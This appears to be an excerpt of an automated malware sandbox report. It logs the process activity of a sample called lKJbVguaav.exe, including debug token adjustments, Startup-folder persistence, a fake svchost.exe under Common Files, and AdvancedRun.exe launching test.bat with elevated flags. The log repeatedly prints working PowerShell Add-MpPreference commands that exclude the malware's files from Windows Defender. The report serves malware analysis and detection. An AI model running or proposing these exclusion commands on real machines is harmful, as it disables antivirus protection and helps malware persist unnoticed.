                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exeProcess created: C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Program Files\Common Files\system\E59A6148\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\lKJbVguaav.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\E59A6148\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Users\user\Desktop\lKJbVguaav.exe C:\Users\user\Desktop\lKJbVguaav.exeJump to behavior
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1860Jump to behavior
